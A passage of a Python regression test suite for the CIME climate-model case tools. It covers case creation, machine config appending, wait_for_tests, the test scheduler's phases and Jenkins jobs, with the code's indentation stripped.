file_text = file_text.replace(os.path.basename(testdir1),"PATH")
file_text = re.sub(r"logfile =.*","",file_text)
with open(os.path.join(dir2,_file), "w") as fo:
fo.write(file_text)
cleancasedocs1 = dir2
testdir2 = os.path.join(cls._testroot, 'testcreatenewcase_alias_compset')
if os.path.exists(testdir2):
shutil.rmtree(testdir2)
cls._testdirs.append(testdir2)
args = ' --case CreateNewcaseTest --script-root {} --compset ADSOMAQP --res f19_g16 --output-root {} --handle-preexisting-dirs u'.format(testdir2, cls._testroot)
if CIME.utils.get_model() == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args += " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args += " --mpilib %s"%TEST_MPILIB
run_cmd_assert_result(self, "{}/create_newcase {}".format(SCRIPT_DIR, args), from_dir=SCRIPT_DIR)
run_cmd_assert_result(self, "./case.setup ", from_dir=testdir2)
run_cmd_assert_result(self, "./preview_namelists ", from_dir=testdir2)
dir1 = os.path.join(testdir2,"CaseDocs")
dir2 = os.path.join(testdir2,"CleanCaseDocs")
os.mkdir(dir2)
for _file in os.listdir(dir1):
if "modelio" in _file:
continue
with open(os.path.join(dir1,_file),"r") as fi:
file_text = fi.read()
file_text = file_text.replace(os.path.basename(testdir2),"PATH")
file_text = re.sub(r"logfile =.*","",file_text)
with open(os.path.join(dir2,_file), "w") as fo:
fo.write(file_text)
cleancasedocs2 = dir2
dcmp = filecmp.dircmp(cleancasedocs1, cleancasedocs2)
self.assertTrue(len(dcmp.diff_files) == 0, "CaseDocs differ {}".format(dcmp.diff_files))
cls._do_teardown.append(testdir1)
cls._do_teardown.append(testdir2)
def test_k_append_config(self):
machlist_before = MACHINE.list_available_machines()
self.assertEqual(len(machlist_before)>1, True, msg="Problem reading machine list")
newmachfile = os.path.join(get_cime_root(),"config",
"xml_schemas","config_machines_template.xml")
MACHINE.read(newmachfile)
machlist_after = MACHINE.list_available_machines()
self.assertEqual(len(machlist_after)-len(machlist_before), 1, msg="Not able to append config_machines.xml {} {}".format(len(machlist_after), len(machlist_before)))
self.assertEqual("mymachine" in machlist_after, True, msg="Not able to append config_machines.xml")
def test_m_createnewcase_alternate_drivers(self):
# Test that case.setup runs for nuopc and moab drivers
cls = self.__class__
model = CIME.utils.get_model()
for driver in ("nuopc", "moab"):
if not os.path.exists(os.path.join(get_cime_root(),"src","drivers",driver)):
self.skipTest("Skipping driver test for {}, driver not found".format(driver))
if ((model == 'cesm' and driver == 'moab') or
(model == 'e3sm' and driver == 'nuopc')):
continue
testdir = os.path.join(cls._testroot, 'testcreatenewcase.{}'.format( driver))
if os.path.exists(testdir):
shutil.rmtree(testdir)
args = " --driver {} --case {} --compset X --res f19_g16 --output-root {} --handle-preexisting-dirs=r".format(driver, testdir, cls._testroot)
if model == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args = args + " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args = args + " --mpilib %s"%TEST_MPILIB
cls._testdirs.append(testdir)
run_cmd_assert_result(self, "./create_newcase %s"%(args), from_dir=SCRIPT_DIR)
self.assertTrue(os.path.exists(testdir))
self.assertTrue(os.path.exists(os.path.join(testdir, "case.setup")))
run_cmd_assert_result(self, "./case.setup", from_dir=testdir)
with Case(testdir, read_only=False) as case:
comp_interface = case.get_value("COMP_INTERFACE")
self.assertTrue(driver == comp_interface, msg="%s != %s"%(driver, comp_interface))
cls._do_teardown.append(testdir)
def test_n_createnewcase_bad_compset(self):
cls = self.__class__
model = CIME.utils.get_model()
testdir = os.path.join(cls._testroot, 'testcreatenewcase_bad_compset')
if os.path.exists(testdir):
shutil.rmtree(testdir)
args = " --case %s --compset InvalidCompsetName --output-root %s --handle-preexisting-dirs=r " % (testdir, cls._testroot)
if model == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args = args + " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args = args + " --mpilib %s"%TEST_MPILIB
if CIME.utils.get_cime_default_driver() == "nuopc":
args += " --res f19_g17 "
else:
args += " --res f19_g16 "
run_cmd_assert_result(self, "./create_newcase %s"%(args),
from_dir=SCRIPT_DIR, expected_stat=1)
self.assertFalse(os.path.exists(testdir))
@classmethod
def tearDownClass(cls):
do_teardown = len(cls._do_teardown) > 0 and sys.exc_info() == (None, None, None) and not NO_TEARDOWN
rmtestroot = True
for tfile in cls._testdirs:
if tfile not in cls._do_teardown:
print("Detected failed test or user request no teardown")
print("Leaving case directory : %s"%tfile)
rmtestroot = False
elif do_teardown:
try:
print ("Attempt to remove directory {}".format(tfile))
shutil.rmtree(tfile)
except BaseException:
print("Could not remove directory {}".format(tfile))
if rmtestroot:
shutil.rmtree(cls._testroot)
###############################################################################
class M_TestWaitForTests(unittest.TestCase):
###############################################################################
###########################################################################
def setUp(self):
###########################################################################
self._testroot = os.path.join(TEST_ROOT,"TestWaitForTests")
self._timestamp = CIME.utils.get_timestamp()
# basic tests
self._testdir_all_pass = os.path.join(self._testroot, 'scripts_regression_tests.testdir_all_pass')
self._testdir_with_fail = os.path.join(self._testroot, 'scripts_regression_tests.testdir_with_fail')
self._testdir_unfinished = os.path.join(self._testroot, 'scripts_regression_tests.testdir_unfinished')
self._testdir_unfinished2 = os.path.join(self._testroot, 'scripts_regression_tests.testdir_unfinished2')
# live tests
self._testdir_teststatus1 = os.path.join(self._testroot, 'scripts_regression_tests.testdir_teststatus1')
self._testdir_teststatus2 = os.path.join(self._testroot, 'scripts_regression_tests.testdir_teststatus2')
self._testdirs = [self._testdir_all_pass, self._testdir_with_fail, self._testdir_unfinished, self._testdir_unfinished2,
self._testdir_teststatus1, self._testdir_teststatus2]
basic_tests = self._testdirs[:self._testdirs.index(self._testdir_teststatus1)]
for testdir in self._testdirs:
if os.path.exists(testdir):
shutil.rmtree(testdir)
os.makedirs(testdir)
for r in range(10):
for testdir in basic_tests:
os.makedirs(os.path.join(testdir, str(r)))
make_fake_teststatus(os.path.join(testdir, str(r)), "Test_%d" % r, TEST_PASS_STATUS, RUN_PHASE)
make_fake_teststatus(os.path.join(self._testdir_with_fail, "5"), "Test_5", TEST_FAIL_STATUS, RUN_PHASE)
make_fake_teststatus(os.path.join(self._testdir_unfinished, "5"), "Test_5", TEST_PEND_STATUS, RUN_PHASE)
make_fake_teststatus(os.path.join(self._testdir_unfinished2, "5"), "Test_5", TEST_PASS_STATUS, SUBMIT_PHASE)
integration_tests = self._testdirs[len(basic_tests):]
for integration_test in integration_tests:
os.makedirs(os.path.join(integration_test, "0"))
make_fake_teststatus(os.path.join(integration_test, "0"), "Test_0", TEST_PASS_STATUS, CORE_PHASES[0])
# Set up proxy if possible
self._unset_proxy = setup_proxy()
self._thread_error = None
###########################################################################
def tearDown(self):
###########################################################################
do_teardown = sys.exc_info() == (None, None, None) and not NO_TEARDOWN
if do_teardown:
for testdir in self._testdirs:
shutil.rmtree(testdir)
kill_subprocesses()
if (self._unset_proxy):
del os.environ["http_proxy"]
###########################################################################
def simple_test(self, testdir, expected_results, extra_args="", build_name=None):
###########################################################################
# Need these flags to test dashboard if e3sm
if CIME.utils.get_model() == "e3sm" and build_name is not None:
extra_args += " -b %s" % build_name
expected_stat = 0 if expected_results == ["PASS"]*len(expected_results) else CIME.utils.TESTS_FAILED_ERR_CODE
output = run_cmd_assert_result(self, "%s/wait_for_tests -p ACME_test */TestStatus %s" % (TOOLS_DIR, extra_args),
from_dir=testdir, expected_stat=expected_stat)
lines = [line for line in output.splitlines() if line.startswith("Test '")]
self.assertEqual(len(lines), len(expected_results))
for idx, line in enumerate(lines):
testname, status = parse_test_status(line)
self.assertEqual(status, expected_results[idx])
self.assertEqual(testname, "Test_%d" % idx)
###########################################################################
def threaded_test(self, testdir, expected_results, extra_args="", build_name=None):
###########################################################################
try:
self.simple_test(testdir, expected_results, extra_args, build_name)
except AssertionError as e:
self._thread_error = str(e)
###########################################################################
def test_wait_for_test_all_pass(self):
###########################################################################
self.simple_test(self._testdir_all_pass, ["PASS"] * 10)
###########################################################################
def test_wait_for_test_with_fail(self):
###########################################################################
expected_results = ["FAIL" if item == 5 else "PASS" for item in range(10)]
self.simple_test(self._testdir_with_fail, expected_results)
###########################################################################
def test_wait_for_test_no_wait(self):
###########################################################################
expected_results = ["PEND" if item == 5 else "PASS" for item in range(10)]
self.simple_test(self._testdir_unfinished, expected_results, "-n")
###########################################################################
def test_wait_for_test_timeout(self):
###########################################################################
expected_results = ["PEND" if item == 5 else "PASS" for item in range(10)]
self.simple_test(self._testdir_unfinished, expected_results, "--timeout=3")
###########################################################################
def test_wait_for_test_wait_for_pend(self):
###########################################################################
run_thread = threading.Thread(target=self.threaded_test, args=(self._testdir_unfinished, ["PASS"] * 10))
run_thread.daemon = True
run_thread.start()
time.sleep(5) # Kinda hacky
self.assertTrue(run_thread.isAlive(), msg="wait_for_tests should have waited")
with TestStatus(test_dir=os.path.join(self._testdir_unfinished, "5")) as ts:
ts.set_status(RUN_PHASE, TEST_PASS_STATUS)
run_thread.join(timeout=10)
self.assertFalse(run_thread.isAlive(), msg="wait_for_tests should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
###########################################################################
def test_wait_for_test_wait_for_missing_run_phase(self):
###########################################################################
run_thread = threading.Thread(target=self.threaded_test, args=(self._testdir_unfinished2, ["PASS"] * 10))
run_thread.daemon = True
run_thread.start()
time.sleep(5) # Kinda hacky
self.assertTrue(run_thread.isAlive(), msg="wait_for_tests should have waited")
with TestStatus(test_dir=os.path.join(self._testdir_unfinished2, "5")) as ts:
ts.set_status(RUN_PHASE, TEST_PASS_STATUS)
run_thread.join(timeout=10)
self.assertFalse(run_thread.isAlive(), msg="wait_for_tests should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
###########################################################################
def test_wait_for_test_wait_kill(self):
###########################################################################
expected_results = ["PEND" if item == 5 else "PASS" for item in range(10)]
run_thread = threading.Thread(target=self.threaded_test, args=(self._testdir_unfinished, expected_results))
run_thread.daemon = True
run_thread.start()
time.sleep(5)
self.assertTrue(run_thread.isAlive(), msg="wait_for_tests should have waited")
kill_python_subprocesses(signal.SIGTERM, expected_num_killed=1, tester=self)
run_thread.join(timeout=10)
self.assertFalse(run_thread.isAlive(), msg="wait_for_tests should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
###########################################################################
def test_wait_for_test_cdash_pass(self):
###########################################################################
expected_results = ["PASS"] * 10
build_name = "regression_test_pass_" + self._timestamp
run_thread = threading.Thread(target=self.threaded_test,
args=(self._testdir_all_pass, expected_results, "", build_name))
run_thread.daemon = True
run_thread.start()
run_thread.join(timeout=10)
self.assertFalse(run_thread.isAlive(), msg="wait_for_tests should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
assert_dashboard_has_build(self, build_name)
###########################################################################
def test_wait_for_test_cdash_kill(self):
###########################################################################
expected_results = ["PEND" if item == 5 else "PASS" for item in range(10)]
build_name = "regression_test_kill_" + self._timestamp
run_thread = threading.Thread(target=self.threaded_test,
args=(self._testdir_unfinished, expected_results, "", build_name))
run_thread.daemon = True
run_thread.start()
time.sleep(5)
self.assertTrue(run_thread.isAlive(), msg="wait_for_tests should have waited")
kill_python_subprocesses(signal.SIGTERM, expected_num_killed=1, tester=self)
run_thread.join(timeout=10)
self.assertFalse(run_thread.isAlive(), msg="wait_for_tests should have finished")
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
assert_dashboard_has_build(self, build_name)
if CIME.utils.get_model() == "e3sm":
cdash_result_dir = os.path.join(self._testdir_unfinished, "Testing")
tag_file = os.path.join(cdash_result_dir, "TAG")
self.assertTrue(os.path.isdir(cdash_result_dir))
self.assertTrue(os.path.isfile(tag_file))
tag = open(tag_file, "r").readlines()[0].strip()
xml_file = os.path.join(cdash_result_dir, tag, "Test.xml")
self.assertTrue(os.path.isfile(xml_file))
xml_contents = open(xml_file, "r").read()
self.assertTrue(r'<TestList><Test>Test_0</Test><Test>Test_1</Test><Test>Test_2</Test><Test>Test_3</Test><Test>Test_4</Test><Test>Test_5</Test><Test>Test_6</Test><Test>Test_7</Test><Test>Test_8</Test><Test>Test_9</Test></TestList>'
in xml_contents)
self.assertTrue(r'<Test Status="notrun"><Name>Test_5</Name>' in xml_contents)
# TODO: Any further checking of xml output worth doing?
###########################################################################
def live_test_impl(self, testdir, expected_results, last_phase, last_status):
###########################################################################
run_thread = threading.Thread(target=self.threaded_test, args=(testdir, expected_results))
run_thread.daemon = True
run_thread.start()
time.sleep(5)
self.assertTrue(run_thread.isAlive(), msg="wait_for_tests should have waited")
for core_phase in CORE_PHASES[1:]:
with TestStatus(test_dir=os.path.join(self._testdir_teststatus1, "0")) as ts:
ts.set_status(core_phase, last_status if core_phase == last_phase else TEST_PASS_STATUS)
time.sleep(5)
if core_phase != last_phase:
self.assertTrue(run_thread.isAlive(), msg="wait_for_tests should have waited after passing phase {}".format(core_phase))
else:
run_thread.join(timeout=10)
self.assertFalse(run_thread.isAlive(), msg="wait_for_tests should have finished after phase {}".format(core_phase))
break
self.assertTrue(self._thread_error is None, msg="Thread had failure: %s" % self._thread_error)
###########################################################################
def test_wait_for_test_test_status_integration_pass(self):
###########################################################################
self.live_test_impl(self._testdir_teststatus1, ["PASS"], RUN_PHASE, TEST_PASS_STATUS)
###########################################################################
def test_wait_for_test_test_status_integration_submit_fail(self):
###########################################################################
self.live_test_impl(self._testdir_teststatus1, ["FAIL"], SUBMIT_PHASE, TEST_FAIL_STATUS)
###############################################################################
class TestCreateTestCommon(unittest.TestCase):
###############################################################################
###########################################################################
def setUp(self):
###########################################################################
self._thread_error = None
self._unset_proxy = setup_proxy()
self._machine = MACHINE.get_machine_name()
self._compiler = MACHINE.get_default_compiler() if TEST_COMPILER is None else TEST_COMPILER
self._baseline_name = "fake_testing_only_%s" % CIME.utils.get_timestamp()
self._baseline_area = os.path.join(TEST_ROOT, "baselines")
self._testroot = TEST_ROOT
self._hasbatch = MACHINE.has_batch_system() and not NO_BATCH
self._do_teardown = not NO_TEARDOWN
###########################################################################
def tearDown(self):
###########################################################################
kill_subprocesses()
if (self._unset_proxy):
del os.environ["http_proxy"]
files_to_clean = []
baselines = os.path.join(self._baseline_area, self._baseline_name)
if (os.path.isdir(baselines)):
files_to_clean.append(baselines)
for test_id in ["master", self._baseline_name]:
for leftover in glob.glob(os.path.join(self._testroot, "*%s*" % test_id)):
files_to_clean.append(leftover)
do_teardown = self._do_teardown and sys.exc_info() == (None, None, None)
if (not do_teardown and files_to_clean):
print("Detected failed test or user request no teardown")
print("Leaving files:")
for file_to_clean in files_to_clean:
print(" " + file_to_clean)
else:
# For batch machines need to avoid race condition as batch system
# finishes I/O for the case.
if self._hasbatch:
time.sleep(5)
for file_to_clean in files_to_clean:
if (os.path.isdir(file_to_clean)):
shutil.rmtree(file_to_clean)
else:
os.remove(file_to_clean)
###########################################################################
def _create_test(self, extra_args, test_id=None, pre_run_errors=False, run_errors=False, env_changes=""):
###########################################################################
# All stub model not supported in nuopc driver
driver = CIME.utils.get_cime_default_driver()
if driver == 'nuopc':
extra_args.append(" ^SMS.T42_T42.S")
test_id = CIME.utils.get_timestamp() if test_id is None else test_id
extra_args.append("-t {}".format(test_id))
extra_args.append("--baseline-root {}".format(self._baseline_area))
if NO_BATCH:
extra_args.append("--no-batch")
if TEST_COMPILER and ([extra_arg for extra_arg in extra_args if "--compiler" in extra_arg] == []):
extra_args.append("--compiler={}".format(TEST_COMPILER))
if TEST_MPILIB and ([extra_arg for extra_arg in extra_args if "--mpilib" in extra_arg] == []):
extra_args.append("--mpilib={}".format(TEST_MPILIB))
extra_args.append("--test-root={0} --output-root={0}".format(TEST_ROOT))
full_run = (set(extra_args) & set(["-n", "--namelist-only", "--no-setup", "--no-build"])) == set()
if self._hasbatch:
expected_stat = 0 if not pre_run_errors else CIME.utils.TESTS_FAILED_ERR_CODE
else:
expected_stat = 0 if not pre_run_errors and not run_errors else CIME.utils.TESTS_FAILED_ERR_CODE
run_cmd_assert_result(self, "{} {}/create_test {}".format(env_changes, SCRIPT_DIR, " ".join(extra_args)),
expected_stat=expected_stat)
if full_run:
self._wait_for_tests(test_id, expect_works=(not pre_run_errors and not run_errors))
###########################################################################
def _wait_for_tests(self, test_id, expect_works=True):
###########################################################################
if self._hasbatch:
timeout_arg = "--timeout={}".format(GLOBAL_TIMEOUT) if GLOBAL_TIMEOUT is not None else ""
expected_stat = 0 if expect_works else CIME.utils.TESTS_FAILED_ERR_CODE
run_cmd_assert_result(self, "{}/wait_for_tests {} *{}/TestStatus".format(TOOLS_DIR, timeout_arg, test_id),
from_dir=self._testroot, expected_stat=expected_stat)
###############################################################################
class O_TestTestScheduler(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_a_phases(self):
###########################################################################
# exclude the MEMLEAK tests here.
tests = get_tests.get_full_test_names(["cime_test_only",
"^TESTMEMLEAKFAIL_P1.f09_g16.X",
"^TESTMEMLEAKPASS_P1.f09_g16.X",
"^TESTRUNSTARCFAIL_P1.f19_g16_rx1.A",
"^TESTTESTDIFF_P1.f19_g16_rx1.A",
"^TESTBUILDFAILEXC_P1.f19_g16_rx1.A",
"^TESTRUNFAILEXC_P1.f19_g16_rx1.A"],
self._machine, self._compiler)
self.assertEqual(len(tests), 3)
ct = TestScheduler(tests, test_root=TEST_ROOT, output_root=TEST_ROOT,
compiler=self._compiler, mpilib=TEST_MPILIB)
build_fail_test = [item for item in tests if "TESTBUILDFAIL" in item][0]
run_fail_test = [item for item in tests if "TESTRUNFAIL" in item][0]
pass_test = [item for item in tests if "TESTRUNPASS" in item][0]
self.assertTrue("BUILDFAIL" in build_fail_test, msg="Wrong test '%s'" % build_fail_test)
self.assertTrue("RUNFAIL" in run_fail_test, msg="Wrong test '%s'" % run_fail_test)
self.assertTrue("RUNPASS" in pass_test, msg="Wrong test '%s'" % pass_test)
for idx, phase in enumerate(ct._phases):
for test in ct._tests:
if (phase == CIME.test_scheduler.TEST_START):
continue
elif (phase == MODEL_BUILD_PHASE):
ct._update_test_status(test, phase, TEST_PEND_STATUS)
if (test == build_fail_test):
ct._update_test_status(test, phase, TEST_FAIL_STATUS)
self.assertTrue(ct._is_broken(test))
self.assertFalse(ct._work_remains(test))
else:
ct._update_test_status(test, phase, TEST_PASS_STATUS)
self.assertFalse(ct._is_broken(test))
self.assertTrue(ct._work_remains(test))
elif (phase == RUN_PHASE):
if (test == build_fail_test):
with self.assertRaises(CIMEError):
ct._update_test_status(test, phase, TEST_PEND_STATUS)
else:
ct._update_test_status(test, phase, TEST_PEND_STATUS)
self.assertFalse(ct._work_remains(test))
if (test == run_fail_test):
ct._update_test_status(test, phase, TEST_FAIL_STATUS)
self.assertTrue(ct._is_broken(test))
else:
ct._update_test_status(test, phase, TEST_PASS_STATUS)
self.assertFalse(ct._is_broken(test))
self.assertFalse(ct._work_remains(test))
else:
with self.assertRaises(CIMEError):
ct._update_test_status(test, ct._phases[idx+1], TEST_PEND_STATUS)
with self.assertRaises(CIMEError):
ct._update_test_status(test, phase, TEST_PASS_STATUS)
ct._update_test_status(test, phase, TEST_PEND_STATUS)
self.assertFalse(ct._is_broken(test))
self.assertTrue(ct._work_remains(test))
with self.assertRaises(CIMEError):
ct._update_test_status(test, phase, TEST_PEND_STATUS)
ct._update_test_status(test, phase, TEST_PASS_STATUS)
with self.assertRaises(CIMEError):
ct._update_test_status(test, phase, TEST_FAIL_STATUS)
self.assertFalse(ct._is_broken(test))
self.assertTrue(ct._work_remains(test))
###########################################################################
def test_b_full(self):
###########################################################################
tests = get_tests.get_full_test_names(["cime_test_only"], self._machine, self._compiler)
test_id="%s-%s" % (self._baseline_name, CIME.utils.get_timestamp())
ct = TestScheduler(tests, test_id=test_id, no_batch=NO_BATCH, test_root=TEST_ROOT,
output_root=TEST_ROOT,compiler=self._compiler, mpilib=TEST_MPILIB)
build_fail_test = [item for item in tests if "TESTBUILDFAIL_" in item][0]
build_fail_exc_test = [item for item in tests if "TESTBUILDFAILEXC" in item][0]
run_fail_test = [item for item in tests if "TESTRUNFAIL_" in item][0]
run_fail_exc_test = [item for item in tests if "TESTRUNFAILEXC" in item][0]
pass_test = [item for item in tests if "TESTRUNPASS" in item][0]
test_diff_test = [item for item in tests if "TESTTESTDIFF" in item][0]
mem_fail_test = [item for item in tests if "TESTMEMLEAKFAIL" in item][0]
mem_pass_test = [item for item in tests if "TESTMEMLEAKPASS" in item][0]
st_arch_fail_test = [item for item in tests if "TESTRUNSTARCFAIL" in item][0]
log_lvl = logging.getLogger().getEffectiveLevel()
logging.disable(logging.CRITICAL)
try:
ct.run_tests()
finally:
logging.getLogger().setLevel(log_lvl)
self._wait_for_tests(test_id, expect_works=False)
test_statuses = glob.glob("%s/*%s/TestStatus" % (self._testroot, test_id))
self.assertEqual(len(tests), len(test_statuses))
for test_status in test_statuses:
ts = TestStatus(test_dir=os.path.dirname(test_status))
test_name = ts.get_name()
log_files = glob.glob("%s/%s*%s/TestStatus.log" % (self._testroot, test_name, test_id))
self.assertEqual(len(log_files), 1, "Expected exactly one TestStatus.log file, found %d" % len(log_files))
log_file = log_files[0]
if (test_name == build_fail_test):
assert_test_status(self, test_name, ts, MODEL_BUILD_PHASE, TEST_FAIL_STATUS)
data = open(log_file, "r").read()
self.assertTrue("Intentional fail for testing infrastructure" in data,
"Broken test did not report build error:\n%s" % data)
elif (test_name == build_fail_exc_test):
data = open(log_file, "r").read()
assert_test_status(self, test_name, ts, SHAREDLIB_BUILD_PHASE, TEST_FAIL_STATUS)
self.assertTrue("Exception from init" in data,
"Broken test did not report build error:\n%s" % data)
elif (test_name == run_fail_test):
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_FAIL_STATUS)
elif (test_name == run_fail_exc_test):
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_FAIL_STATUS)
data = open(log_file, "r").read()
self.assertTrue("Exception from run_phase" in data,
"Broken test did not report run error:\n%s" % data)
elif (test_name == mem_fail_test):
assert_test_status(self, test_name, ts, MEMLEAK_PHASE, TEST_FAIL_STATUS)
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
elif (test_name == test_diff_test):
assert_test_status(self, test_name, ts, "COMPARE_base_rest", TEST_FAIL_STATUS)
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
elif test_name == st_arch_fail_test:
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, STARCHIVE_PHASE, TEST_FAIL_STATUS)
else:
self.assertTrue(test_name in [pass_test, mem_pass_test])
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
if (test_name == mem_pass_test):
assert_test_status(self, test_name, ts, MEMLEAK_PHASE, TEST_PASS_STATUS)
###########################################################################
def test_c_use_existing(self):
###########################################################################
tests = get_tests.get_full_test_names(["TESTBUILDFAIL_P1.f19_g16_rx1.A", "TESTRUNFAIL_P1.f19_g16_rx1.A", "TESTRUNPASS_P1.f19_g16_rx1.A"],
self._machine, self._compiler)
test_id="%s-%s" % (self._baseline_name, CIME.utils.get_timestamp())
ct = TestScheduler(tests, test_id=test_id, no_batch=NO_BATCH, test_root=TEST_ROOT,
output_root=TEST_ROOT,compiler=self._compiler, mpilib=TEST_MPILIB)
build_fail_test = [item for item in tests if "TESTBUILDFAIL" in item][0]
run_fail_test = [item for item in tests if "TESTRUNFAIL" in item][0]
pass_test = [item for item in tests if "TESTRUNPASS" in item][0]
log_lvl = logging.getLogger().getEffectiveLevel()
logging.disable(logging.CRITICAL)
try:
ct.run_tests()
finally:
logging.getLogger().setLevel(log_lvl)
test_statuses = glob.glob("%s/*%s/TestStatus" % (self._testroot, test_id))
self.assertEqual(len(tests), len(test_statuses))
self._wait_for_tests(test_id, expect_works=False)
for test_status in test_statuses:
casedir = os.path.dirname(test_status)
ts = TestStatus(test_dir=casedir)
test_name = ts.get_name()
if test_name == build_fail_test:
assert_test_status(self, test_name, ts, MODEL_BUILD_PHASE, TEST_FAIL_STATUS)
with TestStatus(test_dir=casedir) as ts:
ts.set_status(MODEL_BUILD_PHASE, TEST_PEND_STATUS)
elif test_name == run_fail_test:
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_FAIL_STATUS)
with TestStatus(test_dir=casedir) as ts:
ts.set_status(SUBMIT_PHASE, TEST_PEND_STATUS)
else:
self.assertTrue(test_name == pass_test)
assert_test_status(self, test_name, ts, MODEL_BUILD_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, SUBMIT_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
os.environ["TESTBUILDFAIL_PASS"] = "True"
os.environ["TESTRUNFAIL_PASS"] = "True"
ct2 = TestScheduler(tests, test_id=test_id, no_batch=NO_BATCH, use_existing=True,
test_root=TEST_ROOT,output_root=TEST_ROOT,compiler=self._compiler,
mpilib=TEST_MPILIB)
log_lvl = logging.getLogger().getEffectiveLevel()
logging.disable(logging.CRITICAL)
try:
ct2.run_tests()
finally:
logging.getLogger().setLevel(log_lvl)
self._wait_for_tests(test_id)
for test_status in test_statuses:
ts = TestStatus(test_dir=os.path.dirname(test_status))
test_name = ts.get_name()
assert_test_status(self, test_name, ts, MODEL_BUILD_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, SUBMIT_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
del os.environ["TESTBUILDFAIL_PASS"]
del os.environ["TESTRUNFAIL_PASS"]
# test that passed tests are not re-run
ct2 = TestScheduler(tests, test_id=test_id, no_batch=NO_BATCH, use_existing=True,
test_root=TEST_ROOT,output_root=TEST_ROOT,compiler=self._compiler,
mpilib=TEST_MPILIB)
log_lvl = logging.getLogger().getEffectiveLevel()
logging.disable(logging.CRITICAL)
try:
ct2.run_tests()
finally:
logging.getLogger().setLevel(log_lvl)
self._wait_for_tests(test_id)
for test_status in test_statuses:
ts = TestStatus(test_dir=os.path.dirname(test_status))
test_name = ts.get_name()
assert_test_status(self, test_name, ts, MODEL_BUILD_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, SUBMIT_PHASE, TEST_PASS_STATUS)
assert_test_status(self, test_name, ts, RUN_PHASE, TEST_PASS_STATUS)
###########################################################################
def test_d_retry(self):
###########################################################################
args = ["TESTBUILDFAIL_P1.f19_g16_rx1.A", "TESTRUNFAIL_P1.f19_g16_rx1.A", "TESTRUNPASS_P1.f19_g16_rx1.A", "--retry=1"]
self._create_test(args)
###############################################################################
class P_TestJenkinsGenericJob(TestCreateTestCommon):
###############################################################################
###########################################################################
def setUp(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping Jenkins tests. E3SM feature")
TestCreateTestCommon.setUp(self)
# Need to run in a subdir in order to not have CTest clash. Name it
# such that it should be cleaned up by the parent tearDown
self._testdir = os.path.join(self._testroot, "jenkins_test_%s" % self._baseline_name)
os.makedirs(self._testdir)
# Change root to avoid clashing with other jenkins_generic_jobs
self._jenkins_root = os.path.join(self._testdir, "J")
###########################################################################
def tearDown(self):
###########################################################################
TestCreateTestCommon.tearDown(self)
if "TESTRUNDIFF_ALTERNATE" in os.environ:
del os.environ["TESTRUNDIFF_ALTERNATE"]
###########################################################################
def simple_test(self, expect_works, extra_args, build_name=None):
###########################################################################
if NO_BATCH:
extra_args += " --no-batch"
# Need these flags to test dashboard if e3sm
if CIME.utils.get_model() == "e3sm" and build_name is not None:
extra_args += " -p ACME_test --submit-to-cdash --cdash-build-group=Nightly -c %s" % build_name
run_cmd_assert_result(self, "%s/jenkins_generic_job -r %s %s -B %s" % (TOOLS_DIR, self._testdir, extra_args, self._baseline_area),
from_dir=self._testdir, expected_stat=(0 if expect_works else CIME.utils.TESTS_FAILED_ERR_CODE))
###########################################################################
def threaded_test(self, expect_works, extra_args, build_name=None):
###########################################################################
try:
self.simple_test(expect_works, extra_args, build_name)
except AssertionError as e:
self._thread_error = str(e)
###########################################################################
def assert_num_leftovers(self, suite):
###########################################################################
num_tests_in_tiny = len(get_tests.get_test_suite(suite))
jenkins_dirs = glob.glob("%s/*%s*/" % (self._jenkins_root, self._baseline_name.capitalize())) # case dirs
# scratch_dirs = glob.glob("%s/*%s*/" % (self._testroot, test_id)) # blr/run dirs
self.assertEqual(num_tests_in_tiny, len(jenkins_dirs),
msg="Wrong number of leftover directories in %s, expected %d, see %s" % \
(self._jenkins_root, num_tests_in_tiny, jenkins_dirs))
# JGF: Can't test this at the moment due to root change flag given to jenkins_generic_job
# self.assertEqual(num_tests_in_tiny + 1, len(scratch_dirs),
# msg="Wrong number of leftover directories in %s, expected %d, see %s" % \
# (self._testroot, num_tests_in_tiny, scratch_dirs))
###########################################################################
def test_jenkins_generic_job(self):
###########################################################################
# Generate fresh baselines so that this test is not impacted by
# unresolved diffs
self.simple_test(True, "-t cime_test_only_pass -g -b %s" % self._baseline_name)
self.assert_num_leftovers("cime_test_only_pass")
build_name = "jenkins_generic_job_pass_%s" % CIME.utils.get_timestamp()
self.simple_test(True, "-t cime_test_only_pass -b %s" % self._baseline_name, build_name=build_name)
self.assert_num_leftovers("cime_test_only_pass") # jenkins_generic_job should have automatically cleaned up leftovers from prior run
assert_dashboard_has_build(self, build_name)
###########################################################################
def test_jenkins_generic_job_kill(self):
###########################################################################
build_name = "jenkins_generic_job_kill_%s" % CIME.utils.get_timestamp()
run_thread = threading.Thread(target=self.threaded_test, args=(False, " -t cime_test_only_slow_pass -b master --baseline-compare=no", build_name))
run_thread.daemon = True
run_thread.start()
